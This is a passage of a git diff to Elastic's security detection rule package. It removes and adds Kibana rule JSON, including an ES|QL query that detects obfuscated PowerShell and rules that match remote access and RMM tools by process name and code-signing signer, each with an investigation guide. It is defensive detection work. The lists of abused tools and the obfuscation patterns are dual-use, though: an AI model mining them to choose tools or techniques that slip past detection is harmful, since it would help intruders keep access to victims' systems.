\"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/current/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n### Windows Integration Setup\nThe Windows integration allows you to monitor the Windows OS, services, applications, and more.\n\n#### The following steps should be executed in order to add the Elastic Agent System integration \"windows\" to your system:\n- Go to the Kibana home page and click \u201cAdd integrations\u201d.\n- In the query bar, search for \u201cWindows\u201d and select the integration to see more details about it.\n- Click \u201cAdd Windows\u201d.\n- Configure the integration name and optionally add a description.\n- Review optional and advanced settings accordingly.\n- Add the newly installed \u201cwindows\u201d to an existing or a new agent policy, and deploy the agent on your system from which windows log files are desirable.\n- Click \u201cSave and Continue\u201d.\n- For more details on the integration refer to the [helper guide](https://docs.elastic.co/integrations/windows).\n", - "severity": "low", - "tags": [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Rule Type: ML", - "Rule Type: Machine Learning", - "Tactic: Persistence", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0003", - "name": "Persistence", - "reference": "https://attack.mitre.org/tactics/TA0003/" - }, - "technique": [ - { - "id": "T1543", - "name": "Create or Modify System Process", - "reference": "https://attack.mitre.org/techniques/T1543/", - "subtechnique": [ - { - "id": "T1543.003", - "name": "Windows Service", - "reference": "https://attack.mitre.org/techniques/T1543/003/" - } - ] - } - ] - } - ], - "type": "machine_learning", - "version": 212 - }, - "id": "6d448b96-c922-4adb-b51c-b767f1ea5b76_212", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/6ddb6c33-00ce-4acd-832a-24b251512023_7.json b/packages/security_detection_engine/kibana/security_rule/6ddb6c33-00ce-4acd-832a-24b251512023_7.json deleted file mode 100644 index 7e4504521d7..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/6ddb6c33-00ce-4acd-832a-24b251512023_7.json +++ /dev/null @@ -1,183 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "Identifies PowerShell scripts with an unusually high proportion of whitespace and special characters, often indicative of obfuscation. This behavior is commonly associated with techniques such as SecureString encoding, formatting obfuscation, or character-level manipulation designed to bypass static analysis and AMSI inspection.", - "from": "now-9m", - "language": "esql", - "license": "Elastic License v2", - "name": "Potential PowerShell Obfuscation via Special Character Overuse", - "note": " ## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Potential PowerShell Obfuscation via Special Character Overuse\n\nPowerShell is a powerful scripting language used for task automation and configuration management in Windows environments. Adversaries exploit PowerShell's flexibility to obfuscate scripts, using excessive special characters to evade detection. The detection rule identifies scripts with high special character density, indicating potential obfuscation, by analyzing script length and character patterns, thus aiding in uncovering malicious activities.\n\n### Possible investigation steps\n\n- Review the dedup_space_script_block field to understand the script's structure and identify any suspicious patterns or keywords that might indicate obfuscation techniques.\n- Analyze the replaced_with_fire field to assess the density and distribution of special characters, which can provide insights into the obfuscation methods used.\n- Examine the file.path and host.name fields to determine the origin and context of the script execution, which can help identify if the script was run on a critical system or by a privileged user.\n- Check the user.id and agent.id fields to verify the identity of the user or agent executing the script, which can help assess if the activity aligns with expected behavior or if it might be unauthorized.\n- Correlate the powershell.file.script_block_id with other logs or alerts to identify if similar scripts have been executed elsewhere in the environment, indicating a broader attack pattern.\n\n### False positive analysis\n\n- Scripts with legitimate use of special characters for formatting or encoding may trigger false positives. Review the script's purpose and context to determine if the use of special characters is justified.\n- Automated scripts that heavily rely on string manipulation or dynamic content generation might be flagged. Consider adding exceptions for known scripts or trusted sources to reduce unnecessary alerts.\n- PowerShell scripts used in development or testing environments often contain high special character density. Implement environment-based exclusions to prevent these from being flagged in non-production settings.\n- Scripts utilizing SecureString or other security-related encoding methods may appear obfuscated. Verify the script's origin and purpose, and whitelist these methods if they are part of standard security practices.\n- Regularly update the detection rule to refine the pattern matching and reduce false positives by incorporating feedback from security analysts and system administrators.\n\n### Response and remediation\n\n- Isolate the affected host immediately to prevent lateral movement and further execution of potentially malicious scripts.\n- Terminate any suspicious PowerShell processes identified by the alert to halt ongoing malicious activity.\n- Conduct a thorough review of the script block text and associated metadata to understand the intent and potential impact of the obfuscated script.\n- Remove any unauthorized or malicious scripts from the affected system to prevent re-execution.\n- Restore the system from a known good backup if the script has caused significant changes or damage to the system.\n- Update endpoint protection and intrusion detection systems to recognize and block similar obfuscation techniques in the future.\n- Escalate the incident to the security operations center (SOC) or incident response team for further investigation and to determine if additional systems are affected.\n", - "query": "from logs-windows.powershell_operational* metadata _id, _version, _index\n| where event.code == \"4104\"\n\n// replace repeated spaces used for formatting after a new line with a single space to reduce FPs\n| eval Esql.script_block_tmp = replace(powershell.file.script_block_text, \"\"\"\\n\\s+\"\"\", \"\\n \")\n\n// Look for scripts with more than 1000 chars\n| eval Esql.script_block_length = length(Esql.script_block_tmp)\n| where Esql.script_block_length > 1000\n\n// replace the patterns we are looking for with the \ud83d\udd25 emoji to enable counting them\n// The emoji is used because it's unlikely to appear in scripts and has a consistent character length of 1\n| eval Esql.script_block_tmp = replace(\n Esql.script_block_tmp,\n \"\"\"[\\s\\$\\{\\}\\+\\@\\=\\(\\)\\^\\\\\\\"~\\[\\]\\?\\.]\"\"\",\n \"\ud83d\udd25\"\n)\n\n// count how many patterns were detected by calculating the number of \ud83d\udd25 characters inserted\n| eval Esql.script_block_count = Esql.script_block_length - length(replace(Esql.script_block_tmp, \"\ud83d\udd25\", \"\"))\n\n// Calculate the ratio of special characters to total length\n| eval Esql.script_block_ratio = Esql.script_block_count::double / Esql.script_block_length::double\n\n// keep the fields relevant to the query, although this is not needed as the alert is populated using _id\n| keep\n Esql.script_block_count,\n Esql.script_block_length,\n Esql.script_block_ratio,\n Esql.script_block_tmp,\n powershell.file.*,\n file.path,\n powershell.sequence,\n powershell.total,\n _id,\n _version,\n _index,\n host.name,\n agent.id,\n user.id\n\n// Filter for scripts with high whitespace and special character ratio\n| where Esql.script_block_ratio > 0.75\n", - "related_integrations": [ - { - "package": "windows", - "version": "^3.0.0" - } - ], - "required_fields": [ - { - "ecs": false, - "name": "Esql.script_block_count", - "type": "integer" - }, - { - "ecs": false, - "name": "Esql.script_block_length", - "type": "integer" - }, - { - "ecs": false, - "name": "Esql.script_block_ratio", - "type": "double" - }, - { - "ecs": false, - "name": "Esql.script_block_tmp", - "type": "keyword" - }, - { - "ecs": false, - "name": "_id", - "type": "keyword" - }, - { - "ecs": false, - "name": "_index", - "type": "keyword" - }, - { - "ecs": false, - "name": "_version", - "type": "long" - }, - { - "ecs": true, - "name": "agent.id", - "type": "keyword" - }, - { - "ecs": true, - "name": "file.path", - "type": "keyword" - }, - { - "ecs": true, - "name": "host.name", - "type": "keyword" - }, - { - "ecs": false, - "name": "powershell.file.script_block_entropy_bits", - "type": "double" - }, - { - "ecs": false, - "name": "powershell.file.script_block_hash", - "type": "keyword" - }, - { - "ecs": false, - "name": "powershell.file.script_block_id", - "type": "keyword" - }, - { - "ecs": false, - "name": "powershell.file.script_block_length", - "type": "long" - }, - { - "ecs": false, - "name": "powershell.file.script_block_surprisal_stdev", - "type": "double" - }, - { - "ecs": false, - "name": "powershell.file.script_block_text", - "type": "text" - }, - { - "ecs": false, - "name": "powershell.file.script_block_unique_symbols", - "type": "long" - }, - { - "ecs": false, - "name": "powershell.sequence", - "type": "long" - }, - { - "ecs": false, - "name": "powershell.total", - "type": "long" - }, - { - "ecs": true, - "name": "user.id", - "type": "keyword" - } - ], - "risk_score": 21, - "rule_id": "6ddb6c33-00ce-4acd-832a-24b251512023", - "setup": "## Setup\n\nThe 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```\n", - "severity": "low", - "tags": [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Defense Evasion", - "Data Source: PowerShell Logs", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0005", - "name": "Defense Evasion", - "reference": "https://attack.mitre.org/tactics/TA0005/" - }, - "technique": [ - { - "id": "T1027", - "name": "Obfuscated Files or Information", - "reference": "https://attack.mitre.org/techniques/T1027/" - }, - { - "id": "T1140", - "name": "Deobfuscate/Decode Files or Information", - "reference": "https://attack.mitre.org/techniques/T1140/" - } - ] - }, - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0002", - "name": "Execution", - "reference": "https://attack.mitre.org/tactics/TA0002/" - }, - "technique": [ - { - "id": "T1059", - "name": "Command and Scripting Interpreter", - "reference": "https://attack.mitre.org/techniques/T1059/", - "subtechnique": [ - { - "id": "T1059.001", - "name": "PowerShell", - "reference": "https://attack.mitre.org/techniques/T1059/001/" - } - ] - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "esql", - "version": 7 - }, - "id": "6ddb6c33-00ce-4acd-832a-24b251512023_7", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/6e1a2cc4-d260-11ed-8829-f661ea17fbcc_112.json b/packages/security_detection_engine/kibana/security_rule/6e1a2cc4-d260-11ed-8829-f661ea17fbcc_112.json deleted file mode 100644 index 52e36062c06..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/6e1a2cc4-d260-11ed-8829-f661ea17fbcc_112.json +++ /dev/null @@ -1,118 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "Adversaries may install legitimate remote access tools (RAT) to compromised endpoints for further command-and-control (C2). Adversaries can rely on installed RATs for persistence, execution of native commands and more. This rule detects when a process is started whose name or code signature resembles commonly abused RATs. This is a New Terms rule type indicating the host has not seen this RAT process started before within the last 30 days.", - "from": "now-9m", - "history_window_start": "now-15d", - "index": [ - "logs-endpoint.events.process-*", - "endgame-*", - "winlogbeat-*", - "logs-windows.forwarded*", - "logs-windows.sysmon_operational-*", - "logs-system.security*" - ], - "language": "kuery", - "license": "Elastic License v2", - "name": "First Time Seen Commonly Abused Remote Access Tool Execution", - "new_terms_fields": [ - "host.id" - ], - "note": "## Triage and analysis\n\n### Investigating First Time Seen Commonly Abused Remote Access Tool Execution\n\nRemote access software is a class of tools commonly used by IT departments to provide support by connecting securely to users' computers. Remote access is an ever-growing market where new companies constantly offer new ways of quickly accessing remote systems.\n\nAt the same pace as IT departments adopt these tools, the attackers also adopt them as part of their workflow to connect into an interactive session, maintain access with legitimate software as a persistence mechanism, drop malicious software, etc.\n\nThis rule detects when a remote access tool is seen in the environment for the first time in the last 15 days, enabling analysts to investigate and enforce the correct usage of such tools.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Check if the execution of the remote access tool is approved by the organization's IT department.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Contact the account owner and confirm whether they are aware of this activity.\n - If the tool is not approved for use in the organization, the employee could have been tricked into installing it and providing access to a malicious third party. Investigate whether this third party could be attempting to scam the end-user or gain access to the environment through social engineering.\n- Investigate any abnormal behavior by the subject process, such as network connections, registry or file modifications, and any spawned child processes.\n\n### False positive analysis\n\n- If an authorized support person or administrator used the tool to conduct legitimate support or remote access, consider reinforcing that only tooling approved by the IT policy should be used. The analyst can dismiss the alert if no other suspicious behavior is observed involving the host or users.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Run a full scan using the antimalware tool in place. This scan can reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- If an unauthorized third party did the access via social engineering, consider improvements to the security awareness program.\n- Enforce that only tooling approved by the IT policy should be used for remote access purposes and only by authorized staff.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", - "query": "host.os.type: \"windows\" and\n\n event.category: \"process\" and event.type : \"start\" and\n\n (\n process.code_signature.subject_name : (\n \"Action1 Corporation\" or\n \"AeroAdmin LLC\" or\n \"Ammyy LLC\" or\n \"Atera Networks Ltd\" or\n \"AWERAY PTE. LTD.\" or\n \"BeamYourScreen GmbH\" or\n \"Bomgar Corporation\" or\n \"DUC FABULOUS CO.,LTD\" or\n \"DOMOTZ INC.\" or\n \"DWSNET O\u00dc\" or\n \"FleetDeck Inc\" or\n \"GlavSoft LLC\" or\n \"GlavSoft LLC.\" or\n \"Hefei Pingbo Network Technology Co. Ltd\" or\n \"IDrive, Inc.\" or\n \"IMPERO SOLUTIONS LIMITED\" or\n \"Instant Housecall\" or\n \"ISL Online Ltd.\" or\n \"LogMeIn, Inc.\" or\n \"Monitoring Client\" or\n \"MMSOFT Design Ltd.\" or\n \"Nanosystems S.r.l.\" or\n \"NetSupport Ltd\" or\n \"NinjaRMM, LLC\" or\n \"Parallels International GmbH\" or\n \"philandro Software GmbH\" or\n \"Pro Softnet Corporation\" or\n \"RealVNC\" or\n \"RealVNC Limited\" or\n \"BreakingSecurity.net\" or\n \"Remote Utilities LLC\" or\n \"Rocket Software, Inc.\" or\n \"SAFIB\" or\n \"Servably, Inc.\" or\n \"ShowMyPC INC\" or\n \"Splashtop Inc.\" or\n \"Superops Inc.\" or\n \"TeamViewer\" or\n \"TeamViewer GmbH\" or\n \"TeamViewer Germany GmbH\" or\n \"Techinline Limited\" or\n \"uvnc bvba\" or\n \"Yakhnovets Denis Aleksandrovich IP\" or\n \"Zhou Huabing\"\n ) or\n\n process.name.caseless : (\n AA_v*.exe or\n \"AeroAdmin.exe\" or\n \"AnyDesk.exe\" or\n \"apc_Admin.exe\" or\n \"apc_host.exe\" or\n \"AteraAgent.exe\" or\n aweray_remote*.exe or\n \"AweSun.exe\" or\n \"B4-Service.exe\" or\n \"BASupSrvc.exe\" or\n \"bomgar-scc.exe\" or\n \"domotzagent.exe\" or\n \"domotz-windows-x64-10.exe\" or\n \"dwagsvc.exe\" or\n \"DWRCC.exe\" or\n \"ImperoClientSVC.exe\" or\n \"ImperoServerSVC.exe\" or\n \"ISLLight.exe\" or\n \"ISLLightClient.exe\" or\n fleetdeck_commander*.exe or\n \"getscreen.exe\" or\n \"LMIIgnition.exe\" or\n \"LogMeIn.exe\" or\n \"ManageEngine_Remote_Access_Plus.exe\" or\n \"Mikogo-Service.exe\" or\n \"NinjaRMMAgent.exe\" or\n \"NinjaRMMAgenPatcher.exe\" or\n \"ninjarmm-cli.exe\" or\n \"r_server.exe\" or\n \"radmin.exe\" or\n \"radmin3.exe\" or\n \"RCClient.exe\" or\n \"RCService.exe\" or\n \"RemoteDesktopManager.exe\" or\n \"RemotePC.exe\" or\n \"RemotePCDesktop.exe\" or\n \"RemotePCService.exe\" or\n \"rfusclient.exe\" or\n \"ROMServer.exe\" or\n \"ROMViewer.exe\" or\n \"RPCSuite.exe\" or\n \"rserver3.exe\" or\n \"rustdesk.exe\" or\n \"rutserv.exe\" or\n \"rutview.exe\" or\n \"saazapsc.exe\" or\n ScreenConnect*.exe or\n \"smpcview.exe\" or\n \"spclink.exe\" or\n \"Splashtop-streamer.exe\" or\n \"SRService.exe\" or\n \"strwinclt.exe\" or\n \"Supremo.exe\" or\n \"SupremoService.exe\" or\n \"teamviewer.exe\" or\n \"TiClientCore.exe\" or\n \"TSClient.exe\" or\n \"tvn.exe\" or\n \"tvnserver.exe\" or\n \"tvnviewer.exe\" or\n UltraVNC*.exe or\n UltraViewer*.exe or\n \"vncserver.exe\" or\n \"vncviewer.exe\" or\n \"winvnc.exe\" or\n \"winwvc.exe\" or\n \"Zaservice.exe\" or\n \"ZohoURS.exe\"\n ) or\n process.name : (\n AA_v*.exe or\n \"AeroAdmin.exe\" or\n \"AnyDesk.exe\" or\n \"apc_Admin.exe\" or\n \"apc_host.exe\" or\n \"AteraAgent.exe\" or\n aweray_remote*.exe or\n \"AweSun.exe\" or\n \"B4-Service.exe\" or\n \"BASupSrvc.exe\" or\n \"bomgar-scc.exe\" or\n \"domotzagent.exe\" or\n \"domotz-windows-x64-10.exe\" or\n \"dwagsvc.exe\" or\n \"DWRCC.exe\" or\n \"ImperoClientSVC.exe\" or\n \"ImperoServerSVC.exe\" or\n \"ISLLight.exe\" or\n \"ISLLightClient.exe\" or\n fleetdeck_commander*.exe or\n \"getscreen.exe\" or\n \"LMIIgnition.exe\" or\n \"LogMeIn.exe\" or\n \"ManageEngine_Remote_Access_Plus.exe\" or\n \"Mikogo-Service.exe\" or\n \"NinjaRMMAgent.exe\" or\n \"NinjaRMMAgenPatcher.exe\" or\n \"ninjarmm-cli.exe\" or\n \"r_server.exe\" or\n \"radmin.exe\" or\n \"radmin3.exe\" or\n \"RCClient.exe\" or\n \"RCService.exe\" or\n \"RemoteDesktopManager.exe\" or\n \"RemotePC.exe\" or\n \"RemotePCDesktop.exe\" or\n \"RemotePCService.exe\" or\n \"rfusclient.exe\" or\n \"ROMServer.exe\" or\n \"ROMViewer.exe\" or\n \"RPCSuite.exe\" or\n \"rserver3.exe\" or\n \"rustdesk.exe\" or\n \"rutserv.exe\" or\n \"rutview.exe\" or\n \"saazapsc.exe\" or\n ScreenConnect*.exe or\n \"smpcview.exe\" or\n \"spclink.exe\" or\n \"Splashtop-streamer.exe\" or\n \"SRService.exe\" or\n \"strwinclt.exe\" or\n \"Supremo.exe\" or\n \"SupremoService.exe\" or\n \"teamviewer.exe\" or\n \"TiClientCore.exe\" or\n \"TSClient.exe\" or\n \"tvn.exe\" or\n \"tvnserver.exe\" or\n \"tvnviewer.exe\" or\n UltraVNC*.exe or\n UltraViewer*.exe or\n \"vncserver.exe\" or\n \"vncviewer.exe\" or\n \"winvnc.exe\" or\n \"winwvc.exe\" or\n \"Zaservice.exe\" or\n \"ZohoURS.exe\"\n )\n\t) and\n\n\tnot (process.pe.original_file_name : (\"G2M.exe\" or \"Updater.exe\" or \"powershell.exe\") and process.code_signature.subject_name : \"LogMeIn, Inc.\")\n", - "references": [ - "https://thedfirreport.com/2023/04/03/malicious-iso-file-leads-to-domain-wide-ransomware/", - "https://attack.mitre.org/techniques/T1219/", - "https://github.com/redcanaryco/surveyor/blob/master/definitions/remote-admin.json" - ], - "related_integrations": [ - { - "package": "endpoint", - "version": "^8.2.0" - }, - { - "package": "windows", - "version": "^3.0.0" - }, - { - "package": "system", - "version": "^2.0.0" - } - ], - "required_fields": [ - { - "ecs": true, - "name": "event.category", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.type", - "type": "keyword" - }, - { - "ecs": true, - "name": "host.os.type", - "type": "keyword" - }, - { - "ecs": true, - "name": "process.code_signature.subject_name", - "type": "keyword" - }, - { - "ecs": true, - "name": "process.name", - "type": "keyword" - }, - { - "ecs": false, - "name": "process.name.caseless", - "type": "unknown" - }, - { - "ecs": true, - "name": "process.pe.original_file_name", - "type": "keyword" - } - ], - "risk_score": 47, - "rule_id": "6e1a2cc4-d260-11ed-8829-f661ea17fbcc", - "severity": "medium", - "tags": [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Command and Control", - "Resources: Investigation Guide", - "Data Source: Elastic Defend", - "Data Source: Elastic Endgame", - "Data Source: Windows Security Event Logs", - "Data Source: Sysmon" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0011", - "name": "Command and Control", - "reference": "https://attack.mitre.org/tactics/TA0011/" - }, - "technique": [ - { - "id": "T1219", - "name": "Remote Access Tools", - "reference": "https://attack.mitre.org/techniques/T1219/" - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "new_terms", - "version": 112 - }, - "id": "6e1a2cc4-d260-11ed-8829-f661ea17fbcc_112", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/6e1a2cc4-d260-11ed-8829-f661ea17fbcc_116.json b/packages/security_detection_engine/kibana/security_rule/6e1a2cc4-d260-11ed-8829-f661ea17fbcc_116.json new file mode 100644 index 00000000000..fd41a2b19d7 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/6e1a2cc4-d260-11ed-8829-f661ea17fbcc_116.json @@ -0,0 +1,138 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Adversaries may install legitimate remote monitoring and management (RMM) tools or remote access software on compromised endpoints for command-and-control (C2), persistence, and execution of native commands. This rule detects when a process is started whose name or code signature (or whose parent's name or code signature) resembles commonly abused RMM/remote access tools, including first-time-seen child processes of such tools. New Terms type: host has not seen this process (or child-of-RMM pattern) before within the configured history window.", + "from": "now-9m", + "history_window_start": "now-7d", + "index": [ + "logs-endpoint.events.process-*", + "endgame-*", + "winlogbeat-*", + "logs-windows.forwarded*", + "logs-windows.sysmon_operational-*", + "logs-system.security*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "First Time Seen Remote Monitoring and Management Tool", + "new_terms_fields": [ + "host.id" + ], + "note": "## Triage and analysis\n\n### Investigating First Time Seen Remote Monitoring and Management Tool\n\nRemote monitoring and management (RMM) and remote access software are commonly used by IT departments to provide support and manage endpoints. Attackers adopt the same tools to connect into interactive sessions, maintain access as a persistence mechanism, and drop malicious software.\n\nThis rule detects when an RMM or remote access process is seen on a host for the first time within the new_terms history window (see rule.new_terms), enabling analysts to investigate and enforce the correct usage of such tools.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Check if the execution of the RMM or remote access tool is approved by the organization's IT department.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Contact the account owner and confirm whether they are aware of this activity.\n - If the tool is not approved for use in the organization, the employee could have been tricked into installing it and providing access to a malicious third party. Investigate whether this third party could be attempting to scam the end-user or gain access to the environment through social engineering.\n- Investigate any abnormal behavior by the subject process, such as network connections, registry or file modifications, and any spawned child processes.\n\n### False positive analysis\n\n- If an authorized support person or administrator used the tool to conduct legitimate support or remote access, consider reinforcing that only tooling approved by the IT policy should be used. The analyst can dismiss the alert if no other suspicious behavior is observed involving the host or users.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Run a full scan using the antimalware tool in place. This scan can reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- If an unauthorized third party did the access via social engineering, consider improvements to the security awareness program.\n- Enforce that only tooling approved by the IT policy should be used for remote access purposes and only by authorized staff.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "host.os.type: \"windows\" and\n\n event.category: \"process\" and event.type: \"start\" and\n\n (\n process.code_signature.subject_name : (\n \"Action1 Corporation\" or\n \"AeroAdmin LLC\" or\n \"Ammyy LLC\" or\n \"Atera Networks Ltd\" or\n \"AWERAY PTE. LTD.\" or\n \"BeamYourScreen GmbH\" or\n \"Bomgar Corporation\" or\n \"DUC FABULOUS CO.,LTD\" or\n \"DOMOTZ INC.\" or\n \"DWSNET O\u00dc\" or\n \"FleetDeck Inc\" or\n \"GlavSoft LLC\" or\n \"GlavSoft LLC.\" or\n \"Hefei Pingbo Network Technology Co. Ltd\" or\n \"IDrive, Inc.\" or\n \"IMPERO SOLUTIONS LIMITED\" or\n \"Instant Housecall\" or\n \"ISL Online Ltd.\" or\n \"LogMeIn, Inc.\" or\n \"Monitoring Client\" or\n \"MMSOFT Design Ltd.\" or\n \"Nanosystems S.r.l.\" or\n \"NetSupport Ltd\" or\n \"NetSupport Ltd.\" or\n \"NETSUPPORT LTD.\" or\n \"NinjaRMM, LLC\" or\n \"Parallels International GmbH\" or\n \"philandro Software GmbH\" or\n \"Pro Softnet Corporation\" or\n \"RealVNC\" or\n \"RealVNC Limited\" or\n \"BreakingSecurity.net\" or\n \"Remote Utilities LLC\" or\n \"Rocket Software, Inc.\" or\n \"SAFIB\" or\n \"Servably, Inc.\" or\n \"ShowMyPC INC\" or\n \"Splashtop Inc.\" or\n \"Superops Inc.\" or\n \"TeamViewer\" or\n \"TeamViewer GmbH\" or\n \"TeamViewer Germany GmbH\" or\n \"Techinline Limited\" or\n \"uvnc bvba\" or\n \"Yakhnovets Denis Aleksandrovich IP\" or\n \"Zhou Huabing\" or\n \"ZOHO Corporation Private Limited\" or\n \"Connectwise, LLC\" or \n\t\t\t\"ScreenConnect Client\" or\n\t\t\t\"Servably Inc.\"\n ) or\n\n process.name.caseless : (\n AA_v*.exe or\n \"AeroAdmin.exe\" or\n \"AnyDesk.exe\" or\n \"apc_Admin.exe\" or\n \"apc_host.exe\" or\n \"AteraAgent.exe\" or\n aweray_remote*.exe or\n \"AweSun.exe\" or\n \"AgentMon.exe\" or\n \"B4-Service.exe\" or\n \"BASupSrvc.exe\" or\n \"bomgar-scc.exe\" or\n \"domotzagent.exe\" or\n \"domotz-windows-x64-10.exe\" or\n \"dwagsvc.exe\" or\n \"DWRCC.exe\" or\n \"ImperoClientSVC.exe\" or\n \"ImperoServerSVC.exe\" or\n \"ISLLight.exe\" or\n \"ISLLightClient.exe\" or\n fleetdeck_commander*.exe or\n \"getscreen.exe\" or\n \"g2aservice.exe\" or\n \"GoToAssistService.exe\" or\n \"gotohttp.exe\" or\n \"jumpcloud-agent.exe\" or\n \"level.exe\" or\n \"LvAgent.exe\" or\n \"LMIIgnition.exe\" or\n \"LogMeIn.exe\" or\n \"ManageEngine_Remote_Access_Plus.exe\" or\n \"MeshAgent.exe\" or\n \"Mikogo-Service.exe\" or\n \"NinjaRMMAgent.exe\" or\n \"NinjaRMMAgenPatcher.exe\" or\n \"ninjarmm-cli.exe\" or\n \"parsec.exe\" or\n \"PService.exe\" or\n \"quickassist.exe\" or\n \"r_server.exe\" or\n \"radmin.exe\" or\n \"radmin3.exe\" or\n \"RCClient.exe\" or\n \"RCService.exe\" or\n \"RemoteDesktopManager.exe\" or\n \"RemotePC.exe\" or\n \"RemotePCDesktop.exe\" or\n \"RemotePCService.exe\" or\n \"rfusclient.exe\" or\n \"ROMServer.exe\" or\n \"ROMViewer.exe\" or\n \"RPCSuite.exe\" or\n \"rserver3.exe\" or\n \"rustdesk.exe\" or\n \"rutserv.exe\" or\n \"rutview.exe\" or\n \"saazapsc.exe\" or\n ScreenConnect*.exe or\n \"session_win.exe\" or\n \"Remote Support.exe\" or\n \"smpcview.exe\" or\n \"spclink.exe\" or\n \"Splashtop-streamer.exe\" or\n \"Syncro.Overmind.Service.exe\" or\n \"SyncroLive.Agent.Runner.exe\" or\n \"SRService.exe\" or\n \"strwinclt.exe\" or\n \"Supremo.exe\" or\n \"SupremoService.exe\" or\n \"tacticalrmm.exe\" or\n \"tailscale.exe\" or\n \"tailscaled.exe\" or\n \"teamviewer.exe\" or\n \"ToDesk_Service.exe\" or\n \"twingate.exe\" or\n \"TiClientCore.exe\" or\n \"TSClient.exe\" or\n \"tvn.exe\" or\n \"tvnserver.exe\" or\n \"tvnviewer.exe\" or\n UltraVNC*.exe or\n UltraViewer*.exe or\n \"vncserver.exe\" or\n \"vncviewer.exe\" or\n \"winvnc.exe\" or\n \"winwvc.exe\" or\n \"Zaservice.exe\" or\n \"ZohoURS.exe\" or\n \"Velociraptor.exe\" or\n \"ToolsIQ.exe\" or\n \"CagService.exe\" or \n\t\t\t\"ScreenConnect.ClientService.exe\" or \n\t\t\t\"TiAgent.exe\" or \n\t\t\t\"GoToResolveProcessChecker.exe\" or \n\t\t\t\"GoToResolveUnattended.exe\" or \n\t\t\t\"Syncro.Installer.exe\"\n ) or\n process.name : (\n AA_v*.exe or\n \"AeroAdmin.exe\" or\n \"AnyDesk.exe\" or\n \"apc_Admin.exe\" or\n \"apc_host.exe\" or\n \"AteraAgent.exe\" or\n aweray_remote*.exe or\n \"AweSun.exe\" or\n \"AgentMon.exe\" or\n \"B4-Service.exe\" or\n \"BASupSrvc.exe\" or\n \"bomgar-scc.exe\" or\n \"CagService.exe\" or\n \"domotzagent.exe\" or\n \"domotz-windows-x64-10.exe\" or\n \"dwagsvc.exe\" or\n \"DWRCC.exe\" or\n \"ImperoClientSVC.exe\" or\n \"ImperoServerSVC.exe\" or\n \"ISLLight.exe\" or\n \"ISLLightClient.exe\" or\n fleetdeck_commander*.exe or\n \"getscreen.exe\" or\n \"g2aservice.exe\" or\n 